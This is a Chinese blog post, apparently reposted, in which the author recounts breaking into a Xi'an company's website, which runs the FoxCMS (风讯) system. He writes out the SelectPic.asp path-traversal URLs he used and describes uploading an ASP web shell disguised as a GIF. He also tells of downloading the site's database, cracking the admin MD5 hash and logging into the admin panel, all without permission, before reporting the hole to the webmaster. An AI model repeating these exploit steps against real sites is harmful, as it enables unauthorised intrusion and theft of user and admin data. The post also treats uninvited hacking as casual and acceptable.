整天在家闲着没事干，想找个附近的公司找点活，赚点生活费。百度了一下“西安招聘”，哇~~好多好多网站啊。。。。
翻开几个看看，有个公司要求还挺高的，习惯性的先看看这个公司的网站，于是有了下文。
打开它的网站，首先看了一下是什么程序写的，发现很多html，还有些asp的，没报多大希望。看到有注册用户，于是我也注册了，当鼠标移动到注册按钮上面时，我发现浏览器左下角显示的路径和文件名都很眼熟，是什么呢？啊~~对了，是风讯。
注册过程中发现和以前看到的注册页面不大一样，于是想：系统这么多，同路径同文件名的大有所在。到了注册完毕，终于看到曙光了。果然就是风讯的，赶紧找上传相片那个地方，然后用：
User/CommPages/SelectPic.asp?CurrPath=/UserFiles/注册获得的ID&f_UserNumber=注册获得的ID
打开看看，接着用：
User/CommPages/SelectPic.asp?CurrPath=/UserFiles/020655AC021/test.aspf_UserNumber=020655AC021
访问，选择了个asp马（后缀当然是gif了），上传成功！打开图片地址访问出错了：

这个目录没执行权，换一个吧。
User/CommPages/SelectPic.asp?CurrPath=/UserFiles/test.asp&f_UserNumber=020655AC021
结果：

晕死了，没搞投了。。。。。
继续浏览一下整个网站看看有什么东西。
User/CommPages/SelectPic.asp?CurrPath=../../f_UserNumber=020655AC021
到网站根目录了：

找到了数据库目录，然后下载数据库，没想到竟然能下载下来。。。。以前见过的都没权限下载的。倒~
找到管理帐号和密码（当然是从MD5破解得来的），然后又用那个漏洞找到了管理登陆处。进入。。。。

看了一下配置文件，是MSsql的，但是不是SA。行了，不搞了。马上加站长QQ通知，有必要了就打他电话，反正都是西安的。
本文来源于：尼克技术博客 http://www.ineeke.cn/ , 原文地址：http://www.ineeke.cn/archives/ruqinjiancewangzhan/